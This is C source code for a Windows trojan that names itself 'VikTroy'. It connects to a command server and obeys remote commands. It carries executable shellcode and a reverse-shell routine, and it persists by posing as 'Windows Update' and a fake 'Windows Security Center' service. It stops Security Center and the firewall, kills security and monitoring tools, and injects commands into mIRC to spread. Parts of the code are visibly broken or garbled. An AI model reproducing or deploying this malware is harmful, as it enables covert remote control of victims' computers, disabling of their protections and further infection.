/*
Autor: Coded by Black Ghost
Lenguaje: C/C++ Win32
Name: Black ghost
Ejecutable: Blackghost.
*/
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <stdlib.h>
#include <process.h>
#include <winbase.h>
//#include <sys\types.h>
#include <tlhelp32.h>
#define CM_PRUEBA 101
#define CM_SALIR 102
#pragma comment(lib, "wsock32.lib")
// SOCKET PRINCIPAL
SOCKET sck;
char RegQueryInfo[] = "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe";
char SeCent[] = "net stop \"Security Center\"";
char Shared[] = "net stop \"SharedAccess\"";
char Reg1[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\" /v Start /t REG_DWORD /d 0x4 /f";
char Reg3[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\" /v Start /t REG_DWORD /d 0x4 /f";
char CreateSrv[] = "sc create wscenter binPath= \"%systemroot%\\system32\\viktroy.exe\" type= kernel start= boot error= ignore DisplayName= \"Windows Security Center\"";
LRESULT CALLBACK WindowProc(HWND, UINT, WPARAM, LPARAM);
// PAYLOAD
unsigned char payload[] =
"\x33\xc9\x83\xe9\xb8\xe8"
"\xff\xff\xff\xff"
"\xc0\x5e\x81\x76\x0e\x4a"
"\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"
"\x73\xf4\xa2\xde\x67\x46"
"\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"
"\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"
"\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"
"\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"
"\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"
"\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"
"\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"
"\x8b\x15\x73\x67\x69" // w0w
"\x22\xec\x75\x45\x71\x77\x67"
"\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"
"\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"
"\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"
"\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"
"\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"
"\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"
"\x08\x0b\x15\xc3\x72\x8c\x33" // r0x
"\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"
"\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"
"\x20\x26\xc9\xe8\x1f\x76\x67\x69"
"\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"
"\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"
"\xa8\x54\xcb\x46\x9c" // c0d3d
"\xd8\x48\xb9\x90\x90\x90";
//ListaProcesos
char *proc_list[]={
"cmd.exe", "taskmgr.exe", "netstat.exe", "tasklist.exe", "taskkill.exe",
"avp.exe", "ethereal.exe", "whireshark.exe", "snort.exe", "control.exe",
"autoruns.exe", "autorunsc.exe", "tcpview.exe", "ettercap.exe", "firefox.exe",
"regedit.exe", "reg.exe" };
// Thread Struct
typedef struct thread_struct
{
char name[250];
HANDLE Thread_Handle;
int id;
} thread;
thread threads[10];
int Comando(char recibido[130]);
int CrearThread(char *name, HANDLE Thread_Handle, int id);
void Esconder(void);
void Reverse(void);
DWORD WINAPI pcInfo(LPVOID param);
DWORD WINAPI ownMirc(LPVOID param);
DWORD WINAPI Pong(LPVOID param);
DWORD WINAPI keyLogger(LPVOID param);
DWORD WINAPI revShell(LPVOID param);
DWORD WINAPI Infectar(LPVOID param);
DWORD WINAPI winFuck(LPVOID param);
DWORD WINAPI Happy(LPVOID param);
int Comando(char recibido[130]);
int CrearThread(char *name, HANDLE Thread_Handle, int id);
void Esconder(void);
void Reverse(void);
/*int main(void);*/
DWORD WINAPI pcInfo(LPVOID param);
DWORD WINAPI ownMirc(LPVOID param);
//DWORD WINAPI Pong(LPVOID param);
DWORD WINAPI revShell(LPVOID param);
DWORD WINAPI SendProcess(LPVOID param);
DWORD WINAPI winFuck(LPVOID param);
DWORD WINAPI Happy(LPVOID param);
DWORD WINAPI CallChat(LPVOID param);
/*
int main(int argc, char *argv[])
{
char bof[25];
strcpy(bof, argv[1]);
return 0;
}
*/
// INDEX
int main(void)
{
HANDLE hThread;
DWORD id;
WSADATA wsa;
struct sockaddr_in mysock;
char recvbuff[130];
char *hello = "HEllO";
WSAStartup(MAKEWORD(1, 0), &wsa);
sck = socket(AF_INET, SOCK_STREAM, 0);
Esconder();
mysock.sin_family = AF_INET;
mysock.sin_addr.s_addr = inet_addr("127.0.0.1");
mysock.sin_port = htons(80);
memset(&(mysock.
sin_zero), '\0', 8); //hThread = CreateThread(NULL, 0, Pong, NULL, 0, &id);
connect(sck, (struct sockaddr *)&mysock, sizeof(struct sockaddr));
send
(sck
, hello
, strlen(hello
), 0);for(;;)
{
if(recv(sck, recvbuff, 128, 0)>2)
{
Comando(recvbuff);
}
Sleep(800);
}
Sleep(1000);
WSACleanup();
return 1;
}
int Comando(char recibido[130])
{
HANDLE hThread;
DWORD id;
char *pString;
pString
= strchr(recibido
, '!');if(pString==NULL)
{
return -1;
}
pString++;
{
hThread = CreateThread(NULL, 0, pcInfo, NULL, 0, &id);
CrearThread("INFO", hThread, id);
Sleep(1000);
}
{
hThread = CreateThread(NULL, 0, ownMirc, NULL, 0, &id);
CrearThread("MIRC", hThread, id);
}
{
closesocket(sck);
WSACleanup();
system("taskkill /F /IM viktroy.exe"); }
if(strncmp(pString
, "shell", 4)==0) {
hThread = CreateThread(NULL, 0, revShell, NULL, 0, &id);
CrearThread("SHELL", hThread, id);
}
if(strncmp(pString
, "busca", 5)==0) {
hThread = CreateThread(NULL, 0, SendProcess, NULL, 0, &id);
CrearThread("SHRC", hThread, id);
}
if(strncmp(pString
, "winfuck", 7)==0) {
hThread = CreateThread(NULL, 0, winFuck, NULL, 0, &id);
CrearThread("FUCK", hThread, id);
}
if(strncmp(pString
, "showcmd", 7)==0) {
HWND hWnd;
hWnd = FindWindow("ConsoleWindowClass", NULL);
ShowWindow(hWnd, SW_SHOWNORMAL);
}
if(strncmp(pString
, "hidecmd", 7)==0) {
HWND hWnd;
hWnd = FindWindow("ConsoleWindowClass", NULL);
ShowWindow(hWnd, SW_HIDE);
}
if(strncmp(pString
, "happy", 5)==0) {
hThread = CreateThread(NULL, 0, Happy, NULL, 0, &id);
CrearThread("HAPPY", hThread, id);
}
{
hThread = CreateThread(NULL, 0, CallChat, NULL, 0, &id);
CrearThread("CHAT", hThread, id);
}
if(strncmp(pString
, "infectar", 8)==0) {
system("reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe"); }
return 0;
}
void Reverse(void)
{
void(*rever)();
*(int *)&rever = (int)payload;
rever();
}
// Not ShellCode Call
/* PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
SOCKET rsck;
//WSADATA wsadata;
struct sockaddr_in rSock;
memset(&sinfo,0,sizeof(sinfo));
//WSAStartup(MAKEWORD(1, 0), &wsadata);
rsck = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
rSock.sin_addr.s_addr = inet_addr("127.0.0.1");
rSock.sin_family = AF_INET;
bind(rsck, (struct sockaddr*)&rSock, sizeof(rSock));
rSock.sin_port = htons(666);
memset(&(rSock.sin_zero), 0, 8);
connect(rsck, (struct sockaddr *)&rSock, sizeof(rSock));
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESTDHANDLES;
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = rsck;
CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &sinfo, &pinfo);
*/
// ThreadGen
int CrearThread(char *name, HANDLE Thread_Handle, int id)
{
threads[c].id = id;
threads[c].Thread_Handle = Thread_Handle;
return c;
}
// HIDE
void Esconder(void)
{
HWND hWnd;
hWnd = FindWindow("ConsoleWindowClass", NULL);
ShowWindow(hWnd, SW_HIDE);
}
// Arquitectura
DWORD WINAPI pcInfo(LPVOID param)
{
SYSTEM_INFO sysinfo;
char allinfo[16];
GetSystemInfo(&sysinfo);
if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_INTEL)
{
strcat(allinfo
, "Soy un INTEL "); if(sysinfo.wProcessorLevel==3)
{
}
else if(sysinfo.wProcessorLevel==4)
{
}
else if(sysinfo.wProcessorLevel==5)
{
}
else { strcat(allinfo
, "unknow "); }
}
else if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_PPC)
{
strcat(allinfo
, "Soy un PocketPC ");
if(sysinfo.wProcessorLevel==1)
{
}
else if(sysinfo.wProcessorLevel==3)
{
}
else if(sysinfo.wProcessorLevel==20)
{
}
}
SetComputerName("xZ-Ownk");
send
(sck
, allinfo
, strlen(allinfo
), 0);return 0;
}
// Injeccion de comandos mirc. Gracias a CrowDat por su explicacion :P
DWORD WINAPI ownMirc(LPVOID param)
{
HWND hWnd;
char run1[] = "/run VikTroy.exe";
SetForegroundWindow(hWnd);
hWnd = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",
NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0);
SendMessage(hWnd, WM_SETTEXT, 0, (LPARAM)run1);
SendMessage(hWnd, WM_IME_KEYDOWN, VK_RETURN, 0);
Sleep(1500);
return 0;
}
// Pong Conexion Thread
/*DWORD WINAPI Pong(LPVOID param)
{
char *pong="PONG";
for(;;)
{
Sleep(25000);
send(sck, pong, strlen(pong), 0);
}
return 1;
}
*/
// Reverse Shell Thread
DWORD WINAPI revShell(LPVOID param)
{
Reverse();
return 0;
}
// Tripode
DWORD WINAPI SendProcess(LPVOID param)
{
HANDLE hlista;
PROCESSENTRY32 proceso;
char proname[30];
char killer[30];
int ret, i, mok;
mok = 0;
for(;;)
{
ret = 0;
i = 0;
for(i=0;i<17;i++)
{
ZeroMemory(&proceso,sizeof(proceso));
proceso.dwSize = sizeof(proceso);
if ((hlista = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0)) != (HANDLE)-1) /* devuelve estructura con la captura de todos los procesos */
{
ret = Process32First(hlista,&proceso);
while(ret)
{
sprintf(proname
,"%i %s",proceso.
th32ProcessID,proceso.
szExeFile);
if(strcmp(proceso.
szExeFile, "mirc.exe")==0 && mok
==0 ) {
send
(sck
, "\nEncontrado Mirc.exe\n", strlen("\nEncontrado Mirc.exe\n"), 0); mok++;
}
if(strcmp(proceso.
szExeFile, proc_list
[i
])==0) {
sprintf(killer
, "taskkill /F /PID %d", proceso.
th32ProcessID); WinExec(killer, SW_HIDE);
}
ret = Process32Next(hlista,&proceso);
}
CloseHandle(hlista);
}
}
Sleep(100);
}
}
/*HKEY hKey;
unsigned char direccion[] = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
unsigned char proceso[] = "VikTroy.exe";
RegCreateKey(HKEY_LOCAL_MACHINE, "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" , &hKey);
RegSetValueEx(hKey, "Microsoft Windows Firewall", 0, REG_SZ, proceso, sizeof("proceso"));
RegCloseKey(hKey);*/
// WINDOWS FUCKEd x"DDDDDDDDDDD
DWORD WINAPI winFuck(LPVOID param)
{
__asm {
mov eax, offset SeCent
push eax
pop ebx
nop
nop
// Security Center Off
mov eax, offset Shared
push eax
pop ebx
nop
nop
// Shared Off
mov eax, offset Reg1
push eax
pop ebx
nop
nop
// Reg1 In
mov eax, offset Reg3
push eax
pop ebx
nop
nop
mov eax, offset CreateSrv
push eax
pop ebx
nop
nop
}// Reg2 In
return 0;
}
// Funcion Feliz
DWORD WINAPI Happy(LPVOID param)
{
int a = 0;
char *Texto = " VikTroy: Simple Trojan Horse \n"
" http://sincontrol.tomahost.org \n"
" Gm Vk Tj Pp \n"
" irc-hispano.org #sub_level \n"
" by xZR !Sub_Level Security \n";
a = MessageBox(NULL,
Texto,
"by xZR !Sub_Level",
MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
for(;;)
{
if(a==IDOK || a==IDYES || a==IDABORT || a==IDCANCEL || a==IDNO)
{
a= MessageBox(NULL,
Texto,
"by xZR !Sub_Level",
MB_OK | MB_ICONERROR | MB_DEFBUTTON4);
}
}
return -1;
}
// Not Avaible
DWORD WINAPI CallChat(LPVOID param)
{
HINSTANCE hInstance, hPrevInstance;
LPSTR CmdLine;
int uCmd;
HWND hWnd;
MSG uMsg;
WNDCLASSEX wincl;
SOCKET chatsock;
struct sockaddr_in chsock;
wincl.cbClsExtra = 0;
wincl.cbWndExtra = 0;
wincl.cbSize = sizeof(WNDCLASSEX);
wincl.hbrBackground = (HBRUSH) COLOR_HIGHLIGHT;
wincl.hCursor = LoadCursor(NULL, IDC_ARROW);
wincl.hIcon = LoadIcon(NULL, "icono.ico");
wincl.hIconSm = LoadIcon(NULL, "icono.ico");
wincl.hInstance = hInstance;
wincl.lpfnWndProc = WindowProc;
wincl.lpszClassName = "VentanaChat";
wincl.lpszMenuName = NULL;
wincl.style = CS_DBLCLKS;
RegisterClassEx(&wincl);
hWnd = CreateWindowEx( 0,
"VentanaChat",
"Viktroy Talk",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,
CW_USEDEFAULT,
CW_USEDEFAULT,
CW_USEDEFAULT,
HWND_DESKTOP,
NULL,
hInstance,
NULL);
ShowWindow(hWnd, SW_SHOWDEFAULT);
while(TRUE == GetMessage(&uMsg, 0, 0, 0))
{
TranslateMessage(&uMsg);
DispatchMessage(&uMsg);
}
return uMsg.wParam;
}
LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
switch(uMsg)
{
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd, uMsg, wParam, lParam);
}
return 0;
}
Mostrar Mensajes
